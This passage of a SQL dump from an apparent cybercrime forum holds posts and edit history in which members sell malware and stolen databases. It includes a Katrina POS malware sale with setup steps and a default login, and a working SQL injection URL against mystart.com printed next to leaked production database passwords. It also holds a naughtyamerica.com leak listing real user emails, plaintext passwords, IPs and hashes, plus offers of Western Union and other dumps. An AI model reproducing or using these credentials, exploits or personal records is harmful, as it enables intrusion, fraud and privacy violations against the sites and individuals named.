(3012, 2494, 0, 'Scrack', 308, 'Katrina POS Source', 1456447580, 'This is the latest version of Katrina source code sale! With it you can build your bin and start getting your own dumps.\n\nWorks on Windows Xp, Vista, 7, 8, 8.1, Server 2003, 2008 and 2012, 32 and 64 bits.\n\n\nPrice is[U] 200$[/U] with 100% support for installation and compilaton and how to use from panel setup to bin building. Setup is user friendly, very good for novice users.\n\nFEATURES\n\n* all original katrina features\n+ more captcha characters\n+ php secured\n* gate compatibility:\n- alina family\n- jackpos\n- katrina\n\n\nINSTALLATION\n\n* decompress panel source to web dir\n* insert \'trinadb.sql\' file into database\n* change config.php database parameters\n* login to panel using: admin/change_ME_soon\n* change the Value of the \'password\' Key for a new password MD5\n- feel free to change \'username\' as well -\n\n[url]https://mega.nz/#!kNhSCR6A!tsD19rM3QIzyIh0ZwJnXVx6AiQd7yiphwKW-T39bvj8[/url]', 1, 0, '108.162.219.114', 0, 1, 0, 0, 0),
(3010, 1026, 2900, 'pyh.ch', 295, '', 1456244075, 'Пожалуйста перезалейте или у кого есть свежее версия?)', 1, 0, '141.101.81.18', 0, 1, 0, 0, 0),
(3011, 1026, 2900, '1337', 291, '', 1456320127, '[QUOTE=gago21;2900]Dead Link Bro :([/QUOTE]\r\n\r\nYou can download it here [url]https://sourceforge.net/projects/milw0rm/[/url]\r\n\r\n[COLOR=\"Red\"] the script contains SQLi vulnerabilities you need to fix it before using[/COLOR]', 1, 0, '162.158.54.161', 0, 1, 0, 0, 0),
(3015, 2495, 0, 'w0rm', 100, 'mystart.com', 1456538961, '_ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--\r\n\r\nFile_priv=y\r\n\r\n[QUOTE]\r\nWarning: require_once(toolbars/Widget-net.net.vmn.[url]www.MyStartFacebook-mediabarbs\'.php[/url]) [function.require-once]: failed to open stream: No such file or directory in /web/sites/wwwvmn/ads.mystart.com/providers/GAdManager/index.php on line 3\r\n[/QUOTE]\r\n\r\n$ cat /web/sites/wwwvmn//web/sites/wwwvmn/apps2.mystart.com/_config.php\r\n\r\n[QUOTE] 1)\r\n define(\'APPLICATION_ENV\', $_SERVER[\'argv\'][1]);\r\n else\r\n define(\'APPLICATION_ENV\', \'production\');\r\n }\r\n else\r\n {\r\n defined(\'APPLICATION_ENV\')\r\n || define(\'APPLICATION_ENV\', (getenv(\'APPLICATION_ENV\') ? getenv(\'APPLICATION_ENV\') : \'production\'));\r\n }\r\n\r\n error_reporting(E_ALL ^ E_NOTICE); // default value, will be overwritten for production\r\n\r\n switch(APPLICATION_ENV)\r\n {\r\n case \'development\':\r\n // Database Access\r\n $_DB_HOST = \"localhost\";\r\n $_DB_USER = \"root\";\r\n $_DB_PASSOWRD = \"\";\r\n $_DB_NAME = \"apps\";\r\n\r\n $_DB_HOST_MASTER = \"localhost\";\r\n $_DB_USER_MASTER = \"root\";\r\n $_DB_PASSOWRD_MASTER = \"\";\r\n $_DB_NAME_MASTER = \"apps\";\r\n\r\n define(\"_MEMCACHE_HOST\" , \"127.0.0.1\");\r\n define(\"_MEMCACHE_PORT\" , 11211);\r\n\r\n $_SERVER_DIR = \'/apps2.mystart.com/\';\r\n\r\n $MEMCACHE_SERVERS = array(\r\n array(\r\n \"host\" => \"localhost\",\r\n \"ip\" => \"127.0.0.1\",\r\n \"port\" => \"11211\"\r\n )\r\n );\r\n\r\n break;\r\n case \'testing\':\r\n // Database Access\r\n $_DB_HOST = \"localhost\";\r\n $_DB_USER = \"root\";\r\n $_DB_PASSOWRD = \"1z9o5t\";\r\n $_DB_NAME = \"apps2\";\r\n\r\n $_DB_HOST_MASTER = \"localhost\";\r\n $_DB_USER_MASTER = \"root\";\r\n $_DB_PASSOWRD_MASTER = \"1z9o5t\";\r\n $_DB_NAME_MASTER = \"apps2\";\r\n\r\n define(\"_MEMCACHE_HOST\" , \"localhost\");\r\n define(\"_MEMCACHE_PORT\" , 11211);\r\n break;\r\n case \'production\':\r\n default:\r\n // Database Access\r\n $_DB_HOST = \"localhost\";\r\n $_DB_USER = \"widgets\";\r\n $_DB_PASSOWRD = \"WhkpE8s4o3OQl\";\r\n $_DB_NAME = \"apps\";\r\n\r\n $_DB_HOST_MASTER = \"visicom-84.nationalnet.com\";\r\n $_DB_USER_MASTER = \"widgets\";\r\n $_DB_PASSOWRD_MASTER = \"WhkpE8s4o3OQl\";\r\n $_DB_NAME_MASTER = \"apps\";\r\n\r\n define(\"_MEMCACHE_HOST\" , \"localhost\");\r\n define(\"_MEMCACHE_PORT\" , 11211);\r\n\r\n $MEMCACHE_SERVERS = array(\r\n array(\r\n \"host\" => \"visicom-84.nationalnet.com\",\r\n \"ip\" => \"visicom-84.nationalnet.com\",\r\n \"port\" => \"11211\"\r\n ),\r\n /*\r\n array(\r\n \"host\" => \"visicom-85.nationalnet.com\",\r\n \"ip\" => \"visicom-85.nationalnet.com\",\r\n \"port\" => \"11211\"\r\n )\r\n */\r\n );\r\n error_reporting(0);\r\n break;\r\n }\r\n\r\n define(\'_POPULAR_DAY_THRESHOLD\', 30); // Number of previous days to count from.\r\n\r\n $_WIDGET_LANGUAGES = array(\"English\" => \"English\", \"French\" => \"French\", \"German\" => \"German\", \"Italian\" => \"Italian\", \"Spanish\" => \"Spanish\");\r\n[/QUOTE]\r\nAny one can upload shell?', 1, 0, '141.101.80.228', 0, 1, 0, 0, 0),
(3019, 1092, 2942, 'dark001', 178, 'Coru.ws dumps', 1456913289, 'Hi \r\n\r\nI am interested please contact me [email]dark001@jabb3r.org[/email]', 1, 0, '141.101.104.91', 0, 0, 0, 0, 0),
(3020, 1026, 3011, 'pyh.ch', 295, '', 1457163689, 'Who has the latest version 0day.today????', 1, 0, '141.101.80.10', 0, 1, 0, 0, 0),
(3021, 2239, 2755, 'tdss', 173, '', 1457279382, 'Am I the only one for whom logging into W0rm jabber is an issue?\n\nedit: it appears to be an issue with the server connected via Psi', 1, 0, '173.245.54.190', 0, 1, 0, 0, 0),
(3028, 1026, 3020, 'orion', 283, '', 1458671790, '[QUOTE=pyh.ch;3020]Who has the latest version 0day.today????[/QUOTE]\r\n\r\nbro that is a scam website dont even know how ppl still think its legit now a days.', 1, 0, '81.91.92.167', 0, 1, 0, 0, 0),
(3031, 2239, 3021, 'orion', 283, 'w0rm.ws jabber account', 1458689258, 'added you on jabber would like a w0rm.ws jabber account thanks!', 1, 0, '81.91.92.167', 0, 0, 0, 0, 0),
(3032, 1026, 3028, 'tdss', 173, '', 1458689624, '[QUOTE=orion;3028]bro that is a scam website dont even know how ppl still think its legit now a days.[/QUOTE]\r\n\r\nthey sell a lot of publicly leaked malware, such as components from Carberp, then censor anyone who exposes it.\r\n\r\nRegardless, based on context, I believe he meant the source code of 1337day\'s website design.', 1, 0, '216.164.19.30', 0, 1, 0, 0, 0),
(3037, 2501, 0, 'orion', 283, 'naughtyamerica.com', 1460311677, 'naughtyamerica.com full dbs plus shell access\r\n\r\n1,677,452 main site\r\n880983 users for ES NA \r\n225349 for nightly users \r\n62,132 forum users NA \r\n40k forum users suite703 \r\n50417 users for suite703 affiliates \r\n\r\nData\r\n\r\nDROP TABLE IF EXISTS `accounts`;CREATE TABLE `accounts` ( `accountid` int(10) unsigned NOT NULL AUTO_INCREMENT, `account_login` char(50) DEFAULT NULL, `account_pass` char(50) DEFAULT NULL, `account_pass_real` text, `display_name` char(50) DEFAULT NULL, `bedroom_url` char(50) DEFAULT NULL, `registered` datetime DEFAULT NULL, `last_login` datetime DEFAULT NULL, `last_ip` char(30) DEFAULT NULL, `location` char(50) DEFAULT NULL, `gender` enum(\'male\',\'female\') DEFAULT NULL, `country` char(3) DEFAULT NULL, `city` char(60) DEFAULT NULL, `zip_code` char(30) DEFAULT NULL, `ip` char(30) DEFAULT NULL, `group_id` int(10) DEFAULT NULL, `freesubscriptionid` int(10) DEFAULT NULL, `avatar` char(40) DEFAULT NULL, `avatar_content_type` char(40) DEFAULT NULL, `avatar_file_size` char(40) DEFAULT NULL, `myspace` tinytext, `nats_code` char(100) DEFAULT \'MTI1NDIzOjQ6OA\', `facebook` tinytext, `twitter` tinytext, `youtube` tinytext, `brand` enum(\'naughtyamerica\',\'suite703\') DEFAULT \'naughtyamerica\', `member_type` enum(\'member\',\'affiliate\',\'pornstar\',\'custom\',\'celebrity\',\'senator\',\'candidate\') DEFAULT \'member\', `my_affiliate_id` int(10) DEFAULT \'0\', `permissions` text, `infractions` int(10) DEFAULT \'0\', `unread_mail` int(5) DEFAULT \'0\', `facebook_id` int(11) DEFAULT \'0\', `sms_number` varchar(15) DEFAULT NULL, `sms_confirmed` enum(\'false\',\'pending\',\'true\',\'disabled\') NOT NULL DEFAULT \'false\', `sms_submitted` datetime DEFAULT NULL, `first_name` char(50) DEFAULT NULL, `last_name` char(50) DEFAULT NULL, `birth_date` date DEFAULT NULL, `significant_other` int(11) DEFAULT \'0\', `spouse` int(11) DEFAULT \'0\', `my_a_id` int(11) DEFAULT \'0\', `vodr` tinyint(1) DEFAULT \'0\', `first_login` tinyint(1) DEFAULT \'0\', `encrypted` tinyint(1) DEFAULT \'0\', `account_email` text, `disablesecurevid` tinyint(1) DEFAULT \'0\', `coins` int(10) DEFAULT \'0\', PRIMARY KEY (`accountid`), KEY `account_login` (`account_login`), KEY `account_pass` (`account_pass`), KEY `account_login, account_pass` (`account_login`,`account_pass`), KEY `brand` (`brand`), KEY `brand_and_url` (`brand`,`bedroom_url`), KEY `Member Type (for NP)` (`member_type`), KEY `Fanclub ID` (`my_a_id`), KEY `spouse` (`spouse`), KEY `Girlfriend/Boyfriend` (`significant_other`), KEY `Last Login Time` (`last_login`), KEY `display_name` (`display_name`)) ENGINE=MyISAM AUTO_INCREMENT=2901418 DEFAULT CHARSET=latin1;\r\n\r\nsample in format of first_name:last_name:account_login:display_name:account_email:ip:account_pass\r\n\r\n::collegeguyco@gmail.com:Suite1557737::67.190.25.58:db5207841d554f25c9748b7cb03afa55::mkjack384@gmail.com:thebigdogzzz22266667::24.251.218.82:8dfa13d25a3100ec8e87ec4cdd8f82c0::czarkowski.m@gmail.com:Sasasa332342::83.25.131.49:9462df1a01f3eb4ddc6dcc4af729b5cd::a241975@klzlk.com:a241975::24.84.81.58:9bf367c7a68121b2c7467edd59cd1366::kraebel@aol.com:Naughty1557751::65.2.249.171:a7fdbe7085bd85ba450d88910527df61::blackpolo1234@yahoo.com:jumbopushuppop35::72.187.3.65:134ca4ab939125796937682deae46f2c::my84montecarloss@yahoo.com:Naughty1557759::208.54.5.59:7d0f0110abd8b026dd155f082a1c292c::alex_the_rap@hotmail.com:Naughty1557761::70.30.170.194:16a54f8124f41c27a5822a3c171fd85a::illidan_899@hotmail.fr:Naughty1561569::90.58.23.83:ab4f63f9ac65152575886860dde480a1::drewboles@gmail.com:Suite1557765::67.164.99.46:b3957749f9d28aa639d205698f0e2d56::pwnsammich@hotmail.com:qlop21232323531::69.76.234.213:814989b983fd853fb374e1676a06ade4::thebigmarjo@hotmail.com:Naughty1557775::173.89.118.159:7295fd840cf3a452e2045a629d14437a::toneenou@hotmail.com:Reapancry4using1::76.122.43.224:9ea0c95d5f97f78640ebe85f94353b5d::jzlaweng@guerrillamailblock.com:applesauce9125::35.11.36.220:cae6f2d78acec0ddde4a03d3883eae02::sdq62@att.net:Naughty1557783::67.72.98.105:78ea50c983fd1b5850c0747942447a64::ttblademaker@yahoo.com:Naughty1557785::96.247.63.176:65d3ab8d2ab5f5e2d4593e220136f84b::nicasio158@gmail.com:Naughty1559231::69.181.48.224:aebfe46795575772b7cf413e25caeab9::millupzz@yahoo.com:Naughty1557811::27.116.49.141:02a57f160413feed2ded106d47179f54::johndoe479589@yahoo.com:Naughty1557787::68.205.97.16:65530c4cbbc5475598db3b6591689e9b::micahch7v7@aol.com:Naughty1557789::71.62.24.56:ca363ab96dcbc6d63b587f00b5a381d2::cobankie@aim.com:Naughty1557791::65.184.57.4:b47853806f18dfefc52f0bb59995697c::sdfafasdfasdf@bk.ru:Naughty1557795::78.154.189.146:d9d1b168eac8f197e0576b56cfc23ece::shabrooki@hotmail.com:Naughty1557797::166.249.131.29:77d3af72e9e8c2190034ab0e5aa727e1::bryanlparkerman@gmail.com:Naughty1557799::38.110.17.37:0f3e557a9578cf92cddde902a3b8427c::jeannelson88@gmail.com:Naughty1557801::174.71.115.42:0b4e7a0e5fe84ad35fb5f95b9ceeac79::rrrmodase@gmail.com:Naughty1557803::117.195.114.133:83829c14837f5551b2dd1e75e43038f7::saurabhbharti@yahoo.in:Naughty1557805::180.215.131.147:abadd5afb17b28e98365fbe864cbc512\r\n\r\n[email]isellpizza@w0rm.ws[/email]', 1, 0, '127.0.0.1', 0, 1, 0, 0, 0),
(3042, 2503, 0, 'admin', 1, 'zoosk.com dump', 1462791410, '[url]https://yadi.sk/d/5xA0DB5Ir5N2N[/url]', 1, 0, '85.105.178.242', 0, 1, 0, 0, 0);
DROP TABLE IF EXISTS `postedithistory`;
CREATE TABLE `postedithistory` (
`postedithistoryid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`title` varchar(250) NOT NULL DEFAULT '',
`iconid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`reason` varchar(200) NOT NULL DEFAULT '',
`original` smallint(6) NOT NULL DEFAULT '0',
`pagetext` mediumtext,
PRIMARY KEY (`postedithistoryid`),
KEY `postid` (`postid`,`userid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
INSERT INTO `postedithistory` (`postedithistoryid`, `postid`, `userid`, `username`, `title`, `iconid`, `dateline`, `reason`, `original`, `pagetext`) VALUES
(9, 2287, 171, 'st1x0', 'geneticsandsociety.org', 0, 1439273803, '', 1, 'Центр генетики\r\nдальше не трогал дабы не спалится, кто захочет сделает то что надо\r\n\r\n[CODE]http://www.geneticsandsociety.org/article.php?id=6527\'[/CODE]'),
(10, 2287, 171, 'st1x0', 'geneticsandsociety.org', 0, 1442920448, '', 0, 'delete site'),
(22, 2895, 178, 'dark001', 'About verified', 0, 1445778141, '', 1, 'Hi \r\n\r\nI wanted to warn you guys about verified.mn I\'ve tried to register to the forum by contacting the admin and paying him 50$ and two weeks later nothing happened. The admin does not answer and does not seems professional at all'),
(23, 2895, 178, 'dark001', 'About verified', 0, 1445862196, '', 0, 'Sorry for posting something not related to the initial post'),
(38, 1028, 1, 'w0rm', 'gazavat', 0, 1403406679, '', 1, 'gazavat admin panel \r\n\r\n[URL=\"https://www.dropbox.com/s/uxqbtdeulwjubq5/gaz.tar.gz\"]download[/URL]'),
(39, 1028, 173, 'tdss', 'gazavat', 0, 1453649441, '', 0, 'gazavat admin panel \r\n\r\n//[URL=\"https://www.dropbox.com/s/uxqbtdeulwjubq5/gaz.tar.gz\"]download[/URL]\r\n\r\nEDIT: Thanks to apimaster, download link [URL=\"https://cloud.mail.ru/public/Drwz/LgSGXyBUA\"]updated[/URL] . Use this instead of the one above, as that one is dead, currently.\r\n\r\n~tdss'),
(40, 1028, 173, 'tdss', 'gazavat', 0, 1453649470, '', 0, 'gazavat admin panel \n\n//[URL=\"https://www.dropbox.com/s/uxqbtdeulwjubq5/gaz.tar.gz\"]download[/URL]\n\nEDIT: Thanks to apimaster, download link [URL=\"https://cloud.mail.ru/public/Drwz/LgSGXyBUA\"]updated-here[/URL] . Use this instead of the one above, as that one is dead, currently.\n\n~tdss'),
(41, 1028, 173, 'tdss', 'gazavat', 0, 1453649999, '', 0, 'gazavat admin panel \n\n//[URL=\"https://www.dropbox.com/s/uxqbtdeulwjubq5/gaz.tar.gz\"]download[/URL]\n\nEDIT: Thanks to apimaster, download link [URL=\"https://cloud.mail.ru/public/8rvi/aYz1sebdr\"]updated-here[/URL] . Use this instead of the one above, as that one is dead, currently.\n\n~tdss'),
(81, 2801, 100, 'w0rm', 'hackers & carders forums', 0, 1442919903, '', 1, '- carder.su\r\n- carder.pro\r\n- carders.cc\r\n- carderplanet.biz\r\n- forum.xakepok.org\r\n- green-hack.net\r\n- inattack\r\n- kiber-zona.org\r\n- verified.ms\r\n- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\nAll for 500$.'),
(82, 2801, 13, 'syslink', 'hackers & carders forums', 0, 1454901222, '', 0, '- carder.su\n- carder.pro\n- carders.cc\n- carderplanet.biz\n- forum.xakepok.org\n- green-hack.net\n- inattack\n- kiber-zona.org\n- verified.ms\n- antichat \n- asechka\n- blackseoschool\n- cih\n- damagelab\n- darklife\n- dehak.ru\n- exploit.in\n- hackzone\n- kode.cc\n- maza\n- korovka.cc\n- milw0rm\n\n[email]mie2soft@jabber.org[/email]\n\nAll for 500$.'),
(83, 2865, 100, 'w0rm', '', 0, 1443713624, '', 1, 'updates:\nbelegit.net \nOpenSC.ws \nFuckAV.ru\nSec4ever\n\n[email]w0rm@cih.ms[/email]'),
(84, 2865, 13, 'syslink', '', 0, 1454901233, '', 0, 'updates:\nbelegit.net \nOpenSC.ws \nFuckAV.ru\nSec4ever\n\n[email]mie2soft@jabber.org[/email]'),
(85, 2800, 100, 'w0rm', 'Monopoly.ms', 0, 1442918885, '', 1, '[email]w0rm@cih.ms[/email] - 500 usd, src+ db.\n2k+ users. 08.09.2015.'),
(86, 2800, 13, 'syslink', 'Monopoly.ms', 0, 1454901315, '', 0, '[email]mie2soft@jabber.org[/email] - 500 usd, src+ db.\n2k+ users. 08.09.2015.'),
(87, 2994, 173, 'tdss', '', 0, 1455212696, '', 1, 'Due to having no desktop access, the best I can do is this: [url]https://dc.ru-board.com/details.php?id=89255[/url]\n\nI will reup later and edit post'),
(88, 2994, 173, 'tdss', '', 0, 1455216688, '', 0, 'Due to having no desktop access, the best I can do is this: [url]https://dc.ru-board.com/details.php?id=89255[/url]\n\nI will reup later and edit post. It is more up to date. I have the ctrl panel but it does not work anyway.'),
(89, 2994, 173, 'tdss', '', 0, 1455216735, '', 0, 'Due to having no desktop access, the best I can do is this: [url]https://dc.ru-board.com/details.php?id=89255[/url]\n\nI will reup later and edit post. It is more up to date. I have the ctrl panel but it does not work anyway. I will upload that too, later. I do not have the source though.'),
(90, 2994, 173, 'tdss', '', 0, 1455217398, '', 0, 'With panel and cracked (updated) but without source (sorry, don\'t have it): [url]https://upload.freehacks.ru/SDWNg0[/url]'),
(91, 2994, 173, 'tdss', '', 0, 1455217507, '', 0, 'With panel and cracked (updated) but without source (sorry, don\'t have it): [url]https://upload.freehacks.ru/SDWNg0[/url]\n\nPassword is: w0rm'),
(103, 2801, 13, 'syslink', 'hackers & carders forums', 0, 1455552959, '', 0, '- carder.su\n- carder.pro\n- carders.cc\n- carderplanet.biz\n- forum.xakepok.org\n- green-hack.net\n- inattack\n- kiber-zona.org\n- verified.ms\n- antichat \n- asechka\n- blackseoschool\n- cih\n- damagelab\n- darklife\n- dehak.ru\n- exploit.in\n- hackzone\n- kode.cc\n- maza\n- korovka.cc\n- milw0rm\n\n[email]w00rm@xmpp.jp[/email]\n\nAll for 500$.'),
(104, 2865, 13, 'syslink', '', 0, 1455552967, '', 0, 'updates:\nbelegit.net \nOpenSC.ws \nFuckAV.ru\nSec4ever\n\n[email]w00rm@xmpp.jp[/email]'),
(105, 2800, 13, 'syslink', 'Monopoly.ms', 0, 1455552979, '', 0, '[email]w00rm@xmpp.jp[/email] - 500 usd, src+ db.\n2k+ users. 08.09.2015.'),
(112, 2878, 100, 'w0rm', 'forum-seo.net', 0, 1444660755, '', 1, 'Fresh & full forum dump.\r\n500USD.\r\n[email]w0rm@cih.ms[/email]'),
(113, 2878, 13, 'syslink', 'forum-seo.net', 0, 1455553161, '', 0, 'Fresh & full forum dump.\n500USD.\n[email]w00rm@xmpp.jp[/email]'),
(157, 2801, 13, 'syslink', 'hackers & carders forums', 0, 1455895731, '', 0, '- carder.su\n- carder.pro\n- carders.cc\n- carderplanet.biz\n- forum.xakepok.org\n- green-hack.net\n- inattack\n- kiber-zona.org\n- verified.ms\n- antichat \n- asechka\n- blackseoschool\n- cih\n- damagelab\n- darklife\n- dehak.ru\n- exploit.in\n- hackzone\n- kode.cc\n- maza\n- korovka.cc\n- milw0rm\n\n[email]bambino3615@jabber.org[/email]\n\nAll for 500$.'),
(158, 2865, 13, 'syslink', '', 0, 1455895739, '', 0, 'updates:\nbelegit.net \nOpenSC.ws \nFuckAV.ru\nSec4ever\n\n[email]bambino3615@jabber.org[/email]'),
(159, 2800, 13, 'syslink', 'Monopoly.ms', 0, 1455895750, '', 0, '[email]bambino3615@jabber.org[/email] - 500 usd, src+ db.\n2k+ users. 08.09.2015.'),
(160, 2878, 13, 'syslink', 'forum-seo.net', 0, 1455895762, '', 0, 'Fresh & full forum dump.\n500USD.\n[email]bambino3615@jabber.org[/email]'),
(168, 2702, 1, 'admin', 'w0rm.ws Jabber', 0, 1442485139, '', 1, '[CENTER]w0rm.ws jabber server online!\r\n\r\nFor registration please contact [email]admin@w0rm.ws[/email][/CENTER]'),
(169, 2702, 13, 'syslink', 'w0rm.ws Jabber', 0, 1455895951, '', 0, '[CENTER]w0rm.ws jabber server online!\n\nFor registration please contact [email]bambino3615@jabber.org[/email][/CENTER]'),
(207, 2800, 383, 'scene', 'Monopoly.ms', 0, 1456128739, '', 0, '[email]root@w0rm.ws[/email] - 500 usd, src+ db.\n2k+ users. 08.09.2015.'),
(208, 2800, 383, 'scene', 'Monopoly.ms', 0, 1456128780, '', 0, 'source + db \nPrice : 500$\n2k+ users. 08.09.2015.\nJabber : [email]root@w0rm.ws[/email] -'),
(209, 2801, 383, 'scene', 'hackers & carders forums', 0, 1456128861, '', 0, '- carder.su\n- carder.pro\n- carders.cc\n- carderplanet.biz\n- forum.xakepok.org\n- green-hack.net\n- inattack\n- kiber-zona.org\n- verified.ms\n- antichat \n- asechka\n- blackseoschool\n- cih\n- damagelab\n- darklife\n- dehak.ru\n- exploit.in\n- hackzone\n- kode.cc\n- maza\n- korovka.cc\n- milw0rm\n\n[email]root@w0rm.ws[/email] -\n\nAll for 500$.'),
(210, 2865, 383, 'scene', '', 0, 1456128876, '', 0, 'updates:\nbelegit.net \nOpenSC.ws \nFuckAV.ru\nSec4ever\n\n[email]root@w0rm.ws[/email]'),
(216, 3021, 173, 'tdss', '', 0, 1457279382, '', 1, 'Am I the only one for whom logging into W0rm jabber is an issue?'),
(217, 3021, 173, 'tdss', '', 0, 1457801344, '', 0, 'Am I the only one for whom logging into W0rm jabber is an issue?\n\nedit: it appears to be an issue with the server connected via Psi'),
(218, 2702, 173, 'tdss', 'w0rm.ws Jabber', 0, 1457883960, '', 0, '[CENTER]w0rm.ws jabber server online!\n\nFor registration please contact [email]admin@w0rm.ws[/email][/CENTER]'),
(284, 3045, 387, 'ke7hb', 'westernunion.com', 0, 1463758995, '', 1, '2TB data\r\nHistory of transactions\r\nAccounts (SHA1 hashed, users + employees)\r\nShell on storage server (not wu.com)\r\n\r\ndb only: 6k in BTC\r\ndb + shell: 15k in BTC\r\n\r\nJabber: [email]ke7hb@w0rm.ws[/email]'),
(285, 3045, 387, 'ke7hb', 'westernunion.com', 0, 1463760123, '', 0, '2TB data\nHistory of transactions\nAccounts (SHA1 hashed, users + employees)\nShell on storage server (not wu.com)\n\ndb only: 6k in BTC\ndb + shell: 17k in BTC\n\nJabber: [email]ke7hb@w0rm.ws[/email]'),
(235, 2878, 173, 'tdss', 'forum-seo.net', 0, 1457983445, '', 0, 'Fresh & full forum dump.\n500USD.\n[email]root@w0rm.ws[/email]');
DROP TABLE IF EXISTS `posthash`;
CREATE TABLE `posthash` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`dupehash` char(32) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
KEY `userid` (`userid`,`dupehash`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `postindex`;
CREATE TABLE `postindex` (
`wordid` int(10) unsigned NOT NULL DEFAULT '0',
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`intitle` smallint(5) unsigned NOT NULL DEFAULT '0',
`score` smallint(5) unsigned NOT NULL DEFAULT '0',
UNIQUE KEY `wordid` (`wordid`,`postid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `postindex` (`wordid`, `postid`, `intitle`, `score`) VALUES
(5, 3037, 0, 1),
(5, 3045, 0, 2),
(5, 3048, 2, 2),
(11, 3012, 0, 1),
(11, 3019, 1, 1),
(18, 3006, 0, 1),
(27, 3037, 0, 1),
(39, 2878, 0, 1),
(39, 3042, 2, 2),
(39, 3050, 0, 1),
(43, 2800, 0, 1),
(43, 2990, 0, 1),
(43, 3012, 0, 1),
(43, 3026, 0, 1),
(43, 3037, 0, 5),
(43, 3045, 0, 1),
(43, 3046, 0, 1),
(50, 2865, 0, 1),
(54, 3046, 0, 1),
(73, 2800, 0, 1),
(73, 3012, 0, 1),
(73, 3026, 0, 1),
(73, 3046, 0, 1),
(113, 3012, 0, 1),
(122, 2982, 0, 1),
(127, 3012, 0, 1),
(130, 2958, 0, 1),
(130, 3047, 0, 1),
(133, 3037, 0, 1),
(139, 3037, 0, 3),
(169, 2958, 0, 1),
(174, 3028, 0, 1),
(174, 3032, 0, 2),
(175, 2800, 0, 1),
(175, 2994, 0, 1),
(175, 2996, 0, 1),
(175, 2999, 0, 1),
(175, 3000, 0, 1),
(175, 3006, 0, 1),
(175, 3012, 2, 4),
(175, 3032, 0, 1),
(176, 2996, 0, 1),
(176, 2997, 0, 1),
(176, 2998, 0, 1),
(176, 2999, 0, 1),
(176, 3000, 0, 1),
(176, 3001, 0, 1),
(176, 3006, 0, 2),
(176, 3012, 0, 1),
(176, 3032, 0, 1),
(178, 3012, 0, 2),
(178, 3026, 2, 3),
(180, 3026, 0, 1),
(181, 3019, 0, 1),
(182, 3026, 0, 1),
(186, 3026, 0, 1),
(186, 3037, 0, 1),
(187, 3012, 0, 1),
(188, 3037, 0, 2),
(189, 2958, 0, 1),
(190, 2958, 0, 1),
(190, 3019, 1, 1),
(191, 2958, 0, 1),
(192, 2958, 0, 1),
(193, 2982, 0, 1),
(193, 2994, 0, 1),
(193, 3021, 0, 1),
(194, 3047, 0, 2),
(198, 3047, 0, 1),
(210, 3032, 0, 1),
(210, 3050, 0, 1),
(237, 3026, 0, 1),
(254, 3048, 0, 1),
(254, 3050, 0, 2),
(264, 2702, 0, 1),
(264, 3019, 0, 1),
(264, 3048, 0, 1),
(264, 3049, 0, 1),
(265, 2983, 0, 1),
(265, 2985, 0, 1),
(269, 2702, 2, 3),
(269, 2800, 0, 1),
(269, 3021, 0, 1),
(269, 3031, 1, 3),
(269, 3045, 0, 1),
(269, 3046, 0, 1),
(272, 3026, 0, 1),
(272, 3046, 0, 1),
(285, 2999, 0, 1),
(285, 3000, 0, 1),
(288, 3048, 0, 1),
(297, 3012, 0, 1),
(297, 3020, 0, 1),
(297, 3028, 0, 1),
(303, 2702, 0, 1),
(304, 2878, 0, 1),
(304, 3037, 0, 2),
(304, 3046, 0, 1),
(308, 3012, 0, 1),
(309, 2996, 0, 1),
(345, 2978, 0, 1),
(346, 3012, 0, 1),
(347, 3037, 0, 1),
(350, 2980, 0, 1),
(350, 2982, 0, 1),
(350, 2983, 0, 1),
(355, 3012, 0, 1),
(361, 2982, 0, 1),
(362, 2982, 0, 1),
(363, 2982, 0, 1),
(364, 2982, 0, 1),
(365, 2982, 0, 1),
(366, 2982, 0, 1),
(367, 2982, 0, 1),
(368, 2982, 0, 1),
(368, 3012, 0, 1),
(368, 3015, 0, 1),
(369, 2982, 0, 1),
(370, 1028, 0, 1),
(370, 2983, 0, 1),
(370, 2985, 0, 1),
(370, 2994, 0, 1),
(370, 2996, 0, 1),
(370, 3012, 0, 3),
(371, 1043, 2, 3),
(372, 1043, 0, 1),
(373, 1043, 0, 1),
(374, 1043, 0, 1),
(375, 1043, 0, 1),
(376, 2984, 0, 1),
(376, 3011, 0, 1),
(377, 1028, 2, 3),
(378, 1028, 0, 1),
(379, 1028, 0, 1),
(380, 1028, 0, 1),
(380, 3021, 0, 1),
(381, 1028, 0, 1),
(382, 1028, 0, 1),
(382, 3011, 0, 1),
(383, 1028, 0, 1),
(383, 2985, 0, 1),
(383, 3003, 0, 1),
(383, 3011, 0, 1),
(384, 2985, 0, 1),
(384, 2994, 0, 1),
(385, 1028, 0, 1),
(385, 3011, 0, 1),
(386, 1028, 0, 1),
(387, 1028, 0, 1),
(388, 2985, 0, 1),
(389, 2985, 0, 1),
(390, 2985, 0, 1),
(391, 2985, 0, 1),
(392, 2985, 0, 1),
(396, 2996, 2, 3),
(396, 3043, 0, 1),
(402, 2702, 0, 1),
(402, 3012, 0, 1),
(402, 3021, 0, 1),
(402, 3045, 0, 1),
(405, 2800, 0, 1),
(405, 2801, 0, 1),
(405, 2865, 0, 1),
(405, 2878, 0, 1),
(406, 2990, 2, 2),
(407, 2990, 2, 2),
(408, 2990, 0, 1),
(409, 2990, 0, 1),
(410, 2990, 0, 1),
(411, 2990, 0, 1),
(412, 2990, 0, 1),
(413, 2990, 0, 1),
(414, 3026, 0, 1),
(452, 3037, 0, 1),
(452, 3045, 0, 1),
(459, 2993, 0, 1),
(459, 2996, 0, 1),
(464, 3012, 0, 1),
